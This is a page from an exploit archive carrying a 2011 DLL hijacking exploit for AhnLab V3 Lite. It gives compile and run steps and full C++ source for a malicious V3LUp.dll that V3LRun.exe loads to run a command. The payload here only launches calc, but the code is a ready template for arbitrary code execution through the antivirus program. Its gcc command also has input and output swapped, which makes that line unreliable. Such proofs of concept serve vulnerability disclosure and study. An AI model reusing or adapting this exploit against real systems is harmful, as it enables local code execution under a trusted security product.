AhnLab V3 Lite (V3LUp.dll) Dll Hijacking Exploit



EKU-ID: 781 CVE: OSVDB-ID:
Author: wh1ant Published: 2011-08-04 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


/* 

# Exploit Title: AhnLab V3 Lite (V3LUp.dll) Dll Hijacking Exploit 
# Date: 03\8\2011
# Author: wh1ant
# Vendor or Software Link: http://v3lite.v3webhard.com/download/V3LiteSG_Setup.exe

# Version:  V3 engine version: 2011.08.03.00
# Category:: local
# Tested on: windows

 

Tested on Microsoft Windows XP Professional SP3 (KR) and Microsoft Windows 7 Ultimate (KR)

Target program V3LRun.exe

 

Compile.
gcc -shared V3LUp.dll -o V3LUp.cpp
or
visual studio 2008 used


Running.
C:\Users\wh1ant>"C:\Program Files\AhnLab\V3Lite\V3LRun.exe" C:\Users\wh1ant\V3LUp.dll,command_run aaa

*/


#include <windows.h>

 

extern "C" __declspec(dllexport)void command_run(void);

 

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
      )
{
 switch (ul_reason_for_call)
 {
 case DLL_PROCESS_ATTACH:
 case DLL_THREAD_ATTACH:
 case DLL_THREAD_DETACH:
 case DLL_PROCESS_DETACH:
  break;
 }
 return TRUE;
}

 

extern "C" __declspec(dllexport)void command_run(void)
{
 WinExec("calc", SW_SHOW);
}